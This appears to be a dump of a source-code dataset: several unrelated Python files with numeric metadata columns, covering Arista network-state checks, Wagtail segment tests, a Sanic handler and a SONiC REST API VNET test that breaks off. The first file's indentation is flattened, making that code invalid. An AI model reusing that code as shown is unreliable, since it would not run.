for peer in response[0]['vrfs'][vrf]['peers']:
if (response[0]['vrfs'][vrf]['peers'][peer]['peerState'] != 'Established') \
or (response[0]['vrfs'][vrf]['peers'][peer]["inMsgQueue"] != 0) \
or (response[0]['vrfs'][vrf]['peers'][peer]["outMsgQueue"] != 0):
return False
count = count + 1
if count == number:
return True
return False
except KeyError:
return None
def verify_bgp_ipv6_unicast_state(device, enable_password):
"""
Verifies all IPv6 unicast BGP sessions are established (for all VRFs)
and all BGP message queues for these sessions are empty (for all VRFs).
Args:
device (jsonrpclib.jsonrpc.ServerProxy): Instance of the class jsonrpclib.jsonrpc.ServerProxy\
with the uri 'https://%s:%s@%s/command-api' %(username, password, ip).
enable_password (str): Enable password.
Returns:
bool: `True` if all IPv6 unicast BGP sessions are established (for all VRFs)
and all BGP message queues for these sessions are empty (for all VRFs).
`False` otherwise.
"""
try:
response = device.runCmds(1, ['show bgp ipv6 unicast summary vrf all'], 'json')
except jsonrpc.AppError:
return None
try:
if len(response[0]['vrfs']) == 0:
return None
for vrf in response[0]['vrfs']:
for peer in response[0]['vrfs'][vrf]['peers']:
if (response[0]['vrfs'][vrf]['peers'][peer]['peerState'] != 'Established') \
or (response[0]['vrfs'][vrf]['peers'][peer]["inMsgQueue"] != 0) or \
(response[0]['vrfs'][vrf]['peers'][peer]["outMsgQueue"] != 0):
return False
return True
except KeyError:
return None
def verify_bgp_evpn_state(device, enable_password):
"""
Verifies all EVPN BGP sessions are established (default VRF).
Args:
device (jsonrpclib.jsonrpc.ServerProxy): Instance of the class jsonrpclib.jsonrpc.ServerProxy\
with the uri 'https://%s:%s@%s/command-api' %(username, password, ip).
enable_password (str): Enable password.
Returns:
bool: `True` if all EVPN BGP sessions are established.
`False` otherwise.
"""
try:
response = device.runCmds(1, ['show bgp evpn summary'], 'json')
except jsonrpc.AppError:
return None
try:
if len(response[0]['vrfs']['default']['peers']) == 0:
return None
for peer in response[0]['vrfs']['default']['peers']:
if response[0]['vrfs']['default']['peers'][peer]['peerState'] != 'Established':
return False
return True
except KeyError:
return None
def verify_bgp_evpn_count(device, enable_password, number):
"""
Verifies all EVPN BGP sessions are established (default VRF)
and the actual number of BGP EVPN neighbors is the one we expect (default VRF).
Args:
device (jsonrpclib.jsonrpc.ServerProxy): Instance of the class jsonrpclib.jsonrpc.ServerProxy\
with the uri 'https://%s:%s@%s/command-api' %(username, password, ip).
enable_password (str): Enable password.
number (int): The expected number of BGP EVPN neighbors in the default VRF.
Returns:
bool: `True` if all EVPN BGP sessions are established
and if the actual number of BGP EVPN neighbors is the one we expect.
`False` otherwise.
"""
if not number:
return None
try:
response = device.runCmds(1, ['show bgp evpn summary'], 'json')
except jsonrpc.AppError:
return None
count = 0
try:
for peer in response[0]['vrfs']['default']['peers']:
if response[0]['vrfs']['default']['peers'][peer]['peerState'] != 'Established':
return False
count = count + 1
if count == number:
return True
return False
except KeyError:
return None
def verify_bgp_rtc_state(device, enable_password):
"""
Verifies all RTC BGP sessions are established (default VRF).
Args:
device (jsonrpclib.jsonrpc.ServerProxy): Instance of the class jsonrpclib.jsonrpc.ServerProxy\
with the uri 'https://%s:%s@%s/command-api' %(username, password, ip).
enable_password (str): Enable password.
Returns:
bool: `True` if all RTC BGP sessions are established.
`False` otherwise.
"""
try:
response = device.runCmds(1, ['show bgp rt-membership summary'], 'json')
except jsonrpc.AppError:
return None
try:
if len(response[0]['vrfs']['default']['peers']) == 0:
return None
for peer in response[0]['vrfs']['default']['peers']:
if response[0]['vrfs']['default']['peers'][peer]['peerState'] != 'Established':
return False
return True
except KeyError:
return None
def verify_bgp_rtc_count(device, enable_password, number):
"""
Verifies all RTC BGP sessions are established (default VRF)
and the actual number of BGP RTC neighbors is the one we expect (default VRF).
Args:
device (jsonrpclib.jsonrpc.ServerProxy): Instance of the class jsonrpclib.jsonrpc.ServerProxy\
with the uri 'https://%s:%s@%s/command-api' %(username, password, ip).
enable_password (str): Enable password.
number (int): The expected number of BGP RTC neighbors (default VRF).
Returns:
bool: `True` if all RTC BGP sessions are established
and if the actual number of BGP RTC neighbors is the one we expect.
`False` otherwise.
"""
if not number:
return None
try:
response = device.runCmds(1, ['show bgp rt-membership summary'], 'json')
except jsonrpc.AppError:
return None
count = 0
try:
for peer in response[0]['vrfs']['default']['peers']:
if response[0]['vrfs']['default']['peers'][peer]['peerState'] != 'Established':
return False
count = count + 1
if count == number:
return True
return False
except KeyError:
return None
def verify_ospf_state(device, enable_password):
"""
Verifies all OSPF neighbors are in FULL state.
Args:
device (jsonrpclib.jsonrpc.ServerProxy): Instance of the class jsonrpclib.jsonrpc.ServerProxy\
with the uri 'https://%s:%s@%s/command-api' %(username, password, ip).
enable_password (str): Enable password.
Returns:
bool: `True` if all OSPF neighbors are in FULL state.
`False` otherwise.
"""
try:
response = device.runCmds(1, ['show ip ospf neighbor | exclude FULL|Address'], 'text')
except jsonrpc.AppError:
return None
try:
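# FULL neighbors and the header are filtered out by the CLI, so any remaining newline indicates a neighbor not in FULL state.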
if response[0]['output'].count('\n') == 0:
return True
return False
except KeyError:
return None
def verify_ospf_count(device, enable_password, number = None):
"""
Verifies the number of OSPF neighbors in FULL state is the one we expect.
Args:
device (jsonrpclib.jsonrpc.ServerProxy): Instance of the class jsonrpclib.jsonrpc.ServerProxy\
with the uri 'https://%s:%s@%s/command-api' %(username, password, ip).
enable_password (str): Enable password.
number (int): The expected number of OSPF neighbors in FULL state.
Returns:
bool: `True` if the number of OSPF neighbors in FULL state is the one we expect.
`False` otherwise.
"""
if not number:
return None
try:
response = device.runCmds(1, ['show ip ospf neighbor | exclude Address'], 'text')
except jsonrpc.AppError:
return None
try:
if response[0]['output'].count('FULL') == number:
return True
return False
except KeyError:
return None
def verify_igmp_snooping_vlans(device, enable_password, vlans, configuration):
"""
Verifies the IGMP snooping configuration for some VLANs.
Args:
device (jsonrpclib.jsonrpc.ServerProxy): Instance of the class jsonrpclib.jsonrpc.ServerProxy\
with the uri 'https://%s:%s@%s/command-api' %(username, password, ip).
enable_password (str): Enable password.
vlans (list): A list of VLANs
configuration (str): Expected IGMP snooping configuration (enabled or disabled) for these VLANs.
Returns:
bool: `True` if the IGMP snooping configuration for the VLANs is the one we expect.
`False` otherwise.
"""
if not vlans or not configuration:
return None
try:
response = device.runCmds(1, ['show ip igmp snooping'],'json')
except jsonrpc.AppError:
return None
try:
for vlan in vlans:
if response[0]['vlans'][str(vlan)]['igmpSnoopingState'] != configuration:
return False
return True
except KeyError:
return None
def verify_igmp_snooping_global(device, enable_password, configuration):
"""
Verifies the IGMP snooping global configuration.
Args:
device (jsonrpclib.jsonrpc.ServerProxy): Instance of the class jsonrpclib.jsonrpc.ServerProxy\
with the uri 'https://%s:%s@%s/command-api' %(username, password, ip).
enable_password (str): Enable password.
configuration (str): Expected global IGMP snooping configuration (enabled or disabled).
Returns:
bool: `True` if the IGMP snooping global configuration is the one we expect.
`False` otherwise.
"""
if not configuration:
return None
try:
response = device.runCmds(1, ['show ip igmp snooping'],'json')
except jsonrpc.AppError:
return None
try:
if response[0]['igmpSnoopingState'] == configuration:
return True
return False
except KeyError:
return None
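# --- Usage sketch: a minimal, hypothetical example of driving these helpers. ---
# The eAPI URI format follows the docstrings above; the host, credentials and
# the set of checks chosen below are placeholder assumptions, not part of the module.
if __name__ == '__main__':
    from jsonrpclib import Server  # the same ServerProxy the docstrings describe
    device = Server('https://%s:%s@%s/command-api' % ('admin', 'password', '10.0.0.1'))
    enable_password = 'enable-secret'
    for check in (verify_ntp, verify_environment_power, verify_bfd):
        # Each helper returns True (pass), False (fail) or None (error / not applicable).
        print('%s: %s' % (check.__name__, check(device, enable_password)))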
| 34.01186 | 128 | 0.611871 | 6,311 | 54,487 | 5.242909 | 0.072255 | 0.068544 | 0.0897 | 0.043248 | 0.838219 | 0.795334 | 0.772999 | 0.737276 | 0.699015 | 0.676015 | 0 | 0.015727 | 0.277644 | 54,487 | 1,601 | 129 | 34.033104 | 0.824945 | 0.438123 | 0 | 0.677623 | 0 | 0 | 0.160249 | 0.006093 | 0 | 0 | 0 | 0 | 0 | 1 | 0.067004 | false | 0.074589 | 0.001264 | 0 | 0.384324 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 6 |
fea613a117f3974044ed730663e39ea2eb007361 | 464 | py | Python | phonology-augmented_transliterator/tone_setter/shared_res/Syllable.py | ngohgia/transliteration | 3acb47a097ff3b320a0718d15c6e62965d346888 | [
"MIT"
] | 1 | 2022-02-21T03:07:06.000Z | 2022-02-21T03:07:06.000Z | phonology-augmented_transliterator/tone_setter/shared_res/Syllable.py | ngohgia/transliteration | 3acb47a097ff3b320a0718d15c6e62965d346888 | [
"MIT"
] | null | null | null | phonology-augmented_transliterator/tone_setter/shared_res/Syllable.py | ngohgia/transliteration | 3acb47a097ff3b320a0718d15c6e62965d346888 | [
"MIT"
] | null | null | null | class Syllable:
def __init__(self):
self.roles = []
self.vie_phonemes = []
self.tone = 1
def create_new_syl(self, vie_phonemes, roles, tone):
self.roles = roles
self.vie_phonemes = vie_phonemes
self.tone = tone
def get_roles_str(self):
return (" ").join(self.roles)
def get_vie_phonemes_str(self):
return (" ").join(self.vie_phonemes)
def __str__(self):
return " ".join(self.vie_phonemes) + " _" + str(self.tone)
| 22.095238 | 62 | 0.650862 | 64 | 464 | 4.375 | 0.265625 | 0.275 | 0.267857 | 0.182143 | 0.303571 | 0.228571 | 0.228571 | 0 | 0 | 0 | 0 | 0.002732 | 0.211207 | 464 | 20 | 63 | 23.2 | 0.762295 | 0 | 0 | 0 | 0 | 0 | 0.010799 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.333333 | false | 0 | 0 | 0.2 | 0.6 | 0 | 0 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 6 |
22a9be500c601bb2e0bc84300f3264adcba0c22b | 3,233 | py | Python | tests/unit/test_rules_query.py | ixc/wagtail-personalisation | 956c1bf4f5846ad86470c41df8b8364bc99ab99b | [
"MIT"
] | 68 | 2018-01-26T22:02:09.000Z | 2022-03-23T08:08:54.000Z | tests/unit/test_rules_query.py | ixc/wagtail-personalisation | 956c1bf4f5846ad86470c41df8b8364bc99ab99b | [
"MIT"
] | 46 | 2018-05-26T09:26:30.000Z | 2022-02-04T15:17:45.000Z | tests/unit/test_rules_query.py | ixc/wagtail-personalisation | 956c1bf4f5846ad86470c41df8b8364bc99ab99b | [
"MIT"
] | 27 | 2018-03-28T10:14:26.000Z | 2022-02-08T20:54:00.000Z | import pytest
from tests.factories.rule import QueryRuleFactory
from tests.factories.segment import SegmentFactory
@pytest.mark.django_db
def test_request_query_rule(client, site):
segment = SegmentFactory(name='Query')
QueryRuleFactory(
parameter="query",
value="value",
segment=segment,
)
response = client.get('/?query=value')
assert response.status_code == 200
assert any(
item['encoded_name'] == 'query' for item in client.session['segments'])
@pytest.mark.django_db
def test_request_only_one_query_rule(client, site):
segment = SegmentFactory(name='Query')
QueryRuleFactory(
parameter="query",
value="value",
segment=segment
)
response = client.get('/?test=test&query=value')
assert response.status_code == 200
assert any(
item['encoded_name'] == 'query' for item in client.session['segments'])
@pytest.mark.django_db
def test_request_multiple_queries(client, site):
segment = SegmentFactory(name='Multiple queries')
QueryRuleFactory(
parameter="test",
value="test",
segment=segment
)
QueryRuleFactory(
parameter="query",
value="value",
segment=segment,
)
response = client.get('/?test=test&query=value')
assert response.status_code == 200
assert any(
item['encoded_name'] == 'multiple-queries'
for item in client.session['segments']
)
@pytest.mark.django_db
def test_request_persistent_segmenting(client, site):
segment = SegmentFactory(name='Persistent', persistent=True)
QueryRuleFactory(
parameter="test",
value="test",
segment=segment
)
response = client.get('/?test=test')
assert response.status_code == 200
assert any(
item['encoded_name'] == 'persistent'
for item in client.session['segments'])
response = client.get('/')
assert response.status_code == 200
assert any(
item['encoded_name'] == 'persistent'
for item in client.session['segments'])
@pytest.mark.django_db
def test_request_non_persistent_segmenting(client, site):
segment = SegmentFactory(name='Non Persistent')
QueryRuleFactory(
parameter="test",
value="test",
segment=segment
)
response = client.get('/?test=test')
assert response.status_code == 200
assert any(
item['encoded_name'] == 'non-persistent'
for item in client.session['segments'])
response = client.get('/')
assert response.status_code == 200
assert not any(
item['encoded_name'] == 'non-persistent'
for item in client.session['segments'])
@pytest.mark.django_db
def test_request_match_any_segmenting(client, site):
segment = SegmentFactory(name='Match any', match_any=True)
QueryRuleFactory(
parameter='test',
value='test',
segment=segment,
)
QueryRuleFactory(
parameter='test2',
value='test2',
segment=segment
)
response = client.get('/?test=test')
assert response.status_code == 200
assert any(
item['encoded_name'] == 'match-any'
for item in client.session['segments'])
| 25.456693 | 79 | 0.646768 | 353 | 3,233 | 5.796034 | 0.127479 | 0.097752 | 0.066471 | 0.093842 | 0.883187 | 0.86608 | 0.829423 | 0.76002 | 0.756109 | 0.69306 | 0 | 0.01045 | 0.230436 | 3,233 | 126 | 80 | 25.65873 | 0.811897 | 0 | 0 | 0.69 | 0 | 0 | 0.144757 | 0.014228 | 0 | 0 | 0 | 0 | 0.16 | 1 | 0.06 | false | 0 | 0.03 | 0 | 0.09 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
22abb520b0ca898ae7a05b0f1b7d5e20d4baeff0 | 31 | py | Python | mpst_ts/scribble/__init__.py | stscript-cgo/STScript | d2ab2a05b997e9487fd3057a38dcec67feb20e53 | [
"Apache-2.0"
] | null | null | null | mpst_ts/scribble/__init__.py | stscript-cgo/STScript | d2ab2a05b997e9487fd3057a38dcec67feb20e53 | [
"Apache-2.0"
] | null | null | null | mpst_ts/scribble/__init__.py | stscript-cgo/STScript | d2ab2a05b997e9487fd3057a38dcec67feb20e53 | [
"Apache-2.0"
] | null | null | null | from .scribble import get_graph | 31 | 31 | 0.870968 | 5 | 31 | 5.2 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.096774 | 31 | 1 | 31 | 31 | 0.928571 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
22d111f648ecb340db36aa7d93aad1000f511f6c | 266 | py | Python | models/bart/__init__.py | ShuyangCao/cliff_summ | 328c83cddc92e00ad8e22f016162c93dedcda3a2 | [
"Apache-2.0"
] | 14 | 2021-09-22T10:43:02.000Z | 2022-03-22T04:54:50.000Z | models/bart/__init__.py | ShuyangCao/cliff_summ | 328c83cddc92e00ad8e22f016162c93dedcda3a2 | [
"Apache-2.0"
] | 10 | 2021-10-08T22:08:30.000Z | 2022-03-30T23:45:30.000Z | models/bart/__init__.py | ShuyangCao/cliff_summ | 328c83cddc92e00ad8e22f016162c93dedcda3a2 | [
"Apache-2.0"
] | 3 | 2021-09-22T15:32:40.000Z | 2021-11-17T11:29:55.000Z | from . import contrastive_translation
from . import contrastive_loss
from . import contrastive_translation_multi_neg
from . import constrative_bart
from . import unlikelihood_translation
from . import unlikelihood_loss
from . import contrastive_translation_batch_neg | 38 | 47 | 0.87218 | 32 | 266 | 6.90625 | 0.34375 | 0.316742 | 0.380091 | 0.434389 | 0.325792 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.101504 | 266 | 7 | 48 | 38 | 0.924686 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 6 |
22d1cb29187267997e35f3cee5f89f22a84895d5 | 223 | py | Python | app/routes/index.py | oseme-techguy/python-pdf-annotation-api-demo | b86dd4e20e9cc13237eacc9a32bb142d4bb28755 | [
"MIT"
] | 1 | 2019-10-10T17:15:23.000Z | 2019-10-10T17:15:23.000Z | app/routes/index.py | oseme-techguy/python-pdf-annotation-api-demo | b86dd4e20e9cc13237eacc9a32bb142d4bb28755 | [
"MIT"
] | null | null | null | app/routes/index.py | oseme-techguy/python-pdf-annotation-api-demo | b86dd4e20e9cc13237eacc9a32bb142d4bb28755 | [
"MIT"
] | null | null | null | """PDF Annotation API - web request handlers."""
from sanic import response
# pylint: disable=W0613
async def index(request):
"""Index request handler."""
return response.text("Welcome to the PDF Annotation API")
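# Wiring sketch: how this handler might be attached to a Sanic application.
# The app name, route and port below are assumptions, not part of this module.
if __name__ == '__main__':
    from sanic import Sanic
    app = Sanic('pdf_annotation_api')
    app.add_route(index, '/')
    app.run(host='0.0.0.0', port=8000)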
| 24.777778 | 61 | 0.717489 | 29 | 223 | 5.517241 | 0.758621 | 0.1625 | 0.2 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.021505 | 0.165919 | 223 | 8 | 62 | 27.875 | 0.83871 | 0.29148 | 0 | 0 | 0 | 0 | 0.266129 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.333333 | 0 | 0.666667 | 0 | 1 | 0 | 0 | null | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
22e8172e8dee79d5b29c7ec6e6baa960069e518b | 136 | py | Python | __init__.py | hsol/homework-toss-server | fd306cecbf9c26943256de3e2663b58982aba57b | [
"MIT"
] | null | null | null | __init__.py | hsol/homework-toss-server | fd306cecbf9c26943256de3e2663b58982aba57b | [
"MIT"
] | null | null | null | __init__.py | hsol/homework-toss-server | fd306cecbf9c26943256de3e2663b58982aba57b | [
"MIT"
] | null | null | null | """
# The Team Showcase
Builds a one-page server that introduces the organizational structure of a company called Blue, Inc.

""" | 19.428571 | 53 | 0.727941 | 22 | 136 | 4.409091 | 0.727273 | 0.216495 | 0.463918 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.147059 | 136 | 7 | 54 | 19.428571 | 0.836207 | 0.933824 | 0 | null | 0 | null | 0 | 0 | null | 0 | 0 | 0 | null | 1 | null | true | 0 | 0 | null | null | null | 1 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
22ff8f45f6be2a600294755ec63b18dde873aea0 | 20,768 | py | Python | tests/restapi/test_restapi.py | emilmih/sonic-mgmt | e4e42ec8028bf51b39587e2b53e526d505fe7938 | [
"Apache-2.0"
] | null | null | null | tests/restapi/test_restapi.py | emilmih/sonic-mgmt | e4e42ec8028bf51b39587e2b53e526d505fe7938 | [
"Apache-2.0"
] | 3 | 2020-11-24T16:04:56.000Z | 2021-06-15T06:44:10.000Z | tests/restapi/test_restapi.py | emilmih/sonic-mgmt | e4e42ec8028bf51b39587e2b53e526d505fe7938 | [
"Apache-2.0"
] | null | null | null | import pytest
import time
import logging
import requests
import json
from tests.common.helpers.assertions import pytest_assert
from restapi_operations import Restapi
logger = logging.getLogger(__name__)
pytestmark = [
pytest.mark.topology('t0'),
pytest.mark.disable_loganalyzer
]
CLIENT_CERT = 'restapiclient.crt'
CLIENT_KEY = 'restapiclient.key'
restapi = Restapi(CLIENT_CERT, CLIENT_KEY)
'''
This test creates a default VxLAN Tunnel and two VNETs. It adds VLAN, VLAN member, VLAN neighbor and routes to each VNET
'''
def test_data_path(construct_url, vlan_members):
# Create Default VxLan Tunnel
params = '{"ip_addr": "10.1.0.32"}'
logger.info("Creating Default VxLan Tunnel with ip_addr: 10.1.0.32")
r = restapi.post_config_tunnel_decap_tunnel_type(construct_url, 'vxlan', params)
pytest_assert(r.status_code == 204)
# Check RESTAPI server heartbeat
logger.info("Checking for RESTAPI server heartbeat")
restapi.heartbeat(construct_url)
#
# Create first VNET and add VLAN, VLAN member, VLAN neighbor and routes to it
#
# Create VNET
params = '{"vnid": 7036001}'
logger.info("Creating VNET vnet-guid-2 with vnid: 7036001")
r = restapi.post_config_vrouter_vrf_id(construct_url, 'vnet-guid-2', params)
pytest_assert(r.status_code == 204)
# Verify VNET has been created
r = restapi.get_config_vrouter_vrf_id(construct_url, 'vnet-guid-2')
pytest_assert(r.status_code == 200)
logger.info(r.json())
expected = '{"attr": {"vnid": 7036001}, "vnet_id": "vnet-guid-2"}'
pytest_assert(r.json() == json.loads(expected))
logger.info("VNET with vnet_id: vnet-guid-2 has been successfully created with vnid: 7036001")
# Create VLAN
params = '{"vnet_id": "vnet-guid-2", "ip_prefix": "100.0.10.1/24"}'
logger.info("Creating VLAN 2000 with ip_prefix: 100.0.10.1/24 under vnet_id: vnet-guid-2")
r = restapi.post_config_vlan(construct_url, '2000', params)
pytest_assert(r.status_code == 204)
# Verify VLAN has been created
r = restapi.get_config_vlan(construct_url, '2000')
pytest_assert(r.status_code == 200)
logger.info(r.json())
expected = '{"attr": {"ip_prefix": "100.0.10.1/24", "vnet_id": "vnet-guid-2"}, "vlan_id": 2000}'
pytest_assert(r.json() == json.loads(expected))
logger.info("VLAN 2000 with ip_prefix: 100.0.10.1/24 under vnet_id: vnet-guid-2 has been successfully created")
vlan_intf = vlan_members[0]
logger.info("VLAN Interface: "+vlan_intf)
# Add and configure VLAN member
params = '{"tagging_mode": "tagged"}'
logger.info("Adding "+vlan_intf+" with tagging_mode: tagged to VLAN 2000")
r = restapi.post_config_vlan_member(construct_url, '2000', vlan_intf, params)
pytest_assert(r.status_code == 204)
# Verify VLAN member has been added
r = restapi.get_config_vlan_member(construct_url, '2000', vlan_intf)
pytest_assert(r.status_code == 200)
logger.info(r.json())
expected = '{"if_name": "'+vlan_intf+'", "vlan_id": 2000, "attr": {"tagging_mode": "tagged"}}'
pytest_assert(r.json() == json.loads(expected))
logger.info(vlan_intf+" with tagging_mode: tagged has been successfully added to VLAN 2000")
# Add neighbor
params = '{}'
logger.info("Adding neighbor 100.0.10.4 to VLAN 2000")
r = restapi.post_config_vlan_neighbor(construct_url, '2000', '100.0.10.4', params)
pytest_assert(r.status_code == 204)
# Verify neighbor has been added
r = restapi.get_config_vlan_neighbor(construct_url, '2000', '100.0.10.4')
pytest_assert(r.status_code == 200)
logger.info(r.json())
expected = '{"ip_addr": "100.0.10.4", "vlan_id": 2000}'
pytest_assert(r.json() == json.loads(expected))
logger.info("Neighbor 100.0.10.4 has been successfully added to VLAN 2000")
# Add routes
params = '[{"cmd": "add", "ip_prefix": "100.0.20.4/32", "nexthop": "100.3.152.52", "vnid": 7036001, "mac_address": null}, \
{"cmd": "add", "ip_prefix": "101.0.20.5/32", "nexthop": "100.3.152.52", "vnid": 7036001, "mac_address": "1c:34:da:72:b0:8a"}, \
{"cmd": "add", "ip_prefix": "192.168.20.4/32", "nexthop": "100.3.152.52", "vnid": 7036001, "mac_address": null}, \
{"cmd": "add", "ip_prefix": "100.0.30.0/24", "nexthop": "100.3.152.52", "vnid": 7036001, "mac_address": null}]'
logger.info("Adding routes with vnid: 7036001 to VNET vnet-guid-2")
r = restapi.patch_config_vrouter_vrf_id_routes(construct_url, 'vnet-guid-2', params)
pytest_assert(r.status_code == 204)
# Verify routes
# Add some delay before query
time.sleep(5)
params = '{}'
r = restapi.get_config_vrouter_vrf_id_routes(construct_url, 'vnet-guid-2', params)
pytest_assert(r.status_code == 200)
logger.info(r.json())
expected = [{"nexthop": "100.3.152.52", "ip_prefix": "192.168.20.4/32", "vnid": 7036001},
{"nexthop": "100.3.152.52", "ip_prefix": "101.0.20.5/32", "mac_address": "1c:34:da:72:b0:8a", "vnid": 7036001},
{"nexthop": "100.3.152.52", "ip_prefix": "100.0.20.4/32", "vnid": 7036001},
{"nexthop": "100.3.152.52", "ip_prefix": "100.0.30.0/24", "vnid": 7036001}]
for route in expected:
pytest_assert(route in r.json())
logger.info("Routes with vnid: 7036001 to VNET vnet-guid-2 have been added successfully")
# Add routes
params = '[{"cmd": "add", "ip_prefix": "100.0.50.4/24", "nexthop": "100.3.152.52", "vnid": 7036001, "mac_address": null}, \
{"cmd": "add", "ip_prefix": "100.0.70.0/16", "nexthop": "100.3.152.52", "vnid": 7036001, "mac_address": null}]'
logger.info("Adding routes with incorrect CIDR addresses with vnid: 7036001 to VNET vnet-guid-2")
r = restapi.patch_config_vrouter_vrf_id_routes(construct_url, 'vnet-guid-2', params)
pytest_assert(r.status_code == 207)
# Verify routes have not been added
# Add some delay before query
time.sleep(5)
params = '{}'
r = restapi.get_config_vrouter_vrf_id_routes(construct_url, 'vnet-guid-2', params)
pytest_assert(r.status_code == 200)
logger.info(r.json())
expected = [{"nexthop": "100.3.152.52", "ip_prefix": "100.0.50.4/24", "vnid": 7036001},
{"nexthop": "100.3.152.52", "ip_prefix": "100.0.70.0/16", "vnid": 7036001}]
for route in expected:
pytest_assert(route not in r.json())
logger.info("Routes with incorrect CIDR addresses with vnid: 7036001 to VNET vnet-guid-2 have not been added successfully")
#
# Create second VNET and add VLAN, VLAN member, VLAN neighbor and routes to it
#
# Create VNET
params = '{"vnid": 7036002}'
logger.info("Creating VNET vnet-guid-3 with vnid: 7036002")
r = restapi.post_config_vrouter_vrf_id(construct_url, 'vnet-guid-3', params)
pytest_assert(r.status_code == 204)
# Verify VNET has been created
r = restapi.get_config_vrouter_vrf_id(construct_url, 'vnet-guid-3')
pytest_assert(r.status_code == 200)
logger.info(r.json())
expected = '{"attr": {"vnid": 7036002}, "vnet_id": "vnet-guid-3"}'
pytest_assert(r.json() == json.loads(expected))
logger.info("VNET with vnet_id: vnet-guid-3 has been successfully created with vnid: 7036002")
# Create VLAN
params = '{"vnet_id": "vnet-guid-3", "ip_prefix": "192.168.10.1/24"}'
logger.info("Creating VLAN 3000 with ip_prefix: 192.168.10.1/24 under vnet_id: vnet-guid-3")
r = restapi.post_config_vlan(construct_url, '3000', params)
pytest_assert(r.status_code == 204)
# Verify VLAN has been created
r = restapi.get_config_vlan(construct_url, '3000')
pytest_assert(r.status_code == 200)
logger.info(r.json())
expected = '{"attr": {"ip_prefix": "192.168.10.1/24", "vnet_id": "vnet-guid-3"}, "vlan_id": 3000}'
pytest_assert(r.json() == json.loads(expected))
logger.info("VLAN 3000 with ip_prefix: 192.168.10.1/24 under vnet_id: vnet-guid-3 has been successfully created")
vlan_intf = vlan_members[1]
logger.info("VLAN Interface: "+vlan_intf)
# Add and configure VLAN member
params = '{"tagging_mode": "tagged"}'
logger.info("Adding "+vlan_intf+" with tagging_mode: tagged to VLAN 3000")
r = restapi.post_config_vlan_member(construct_url, '3000', vlan_intf, params)
pytest_assert(r.status_code == 204)
# Verify VLAN member has been added
r = restapi.get_config_vlan_member(construct_url, '3000', vlan_intf)
pytest_assert(r.status_code == 200)
logger.info(r.json())
expected = '{"if_name": "'+vlan_intf+'", "vlan_id": 3000, "attr": {"tagging_mode": "tagged"}}'
pytest_assert(r.json() == json.loads(expected))
logger.info(vlan_intf+" with tagging_mode: tagged has been successfully added to VLAN 3000")
# Add neighbor
params = '{}'
logger.info("Adding neighbor 192.168.10.4 to VLAN 2000")
r = restapi.post_config_vlan_neighbor(construct_url, '3000', '192.168.10.4', params)
pytest_assert(r.status_code == 204)
# Verify neighbor has been added
r = restapi.get_config_vlan_neighbor(construct_url, '3000', '192.168.10.4')
pytest_assert(r.status_code == 200)
logger.info(r.json())
expected = '{"ip_addr": "192.168.10.4", "vlan_id": 3000}'
pytest_assert(r.json() == json.loads(expected))
logger.info("Neighbor 192.168.10.4 has been successfully added to VLAN 3000")
# Add routes
params = '[{"cmd": "add", "ip_prefix": "100.0.20.4/32", "nexthop": "100.3.152.52", "vnid": 7036002, "mac_address": null}, \
{"cmd": "add", "ip_prefix": "101.0.20.5/32", "nexthop": "100.3.152.52", "vnid": 7036002, "mac_address": "1c:34:da:72:b0:8a"}, \
{"cmd": "add", "ip_prefix": "192.168.20.4/32", "nexthop": "100.3.152.52", "vnid": 7036002, "mac_address": null}, \
{"cmd": "add", "ip_prefix": "100.0.30.0/24", "nexthop": "100.3.152.52", "vnid": 7036002, "mac_address": null}]'
logger.info("Adding routes with vnid: 7036002 to VNET vnet-guid-3")
r = restapi.patch_config_vrouter_vrf_id_routes(construct_url, 'vnet-guid-3', params)
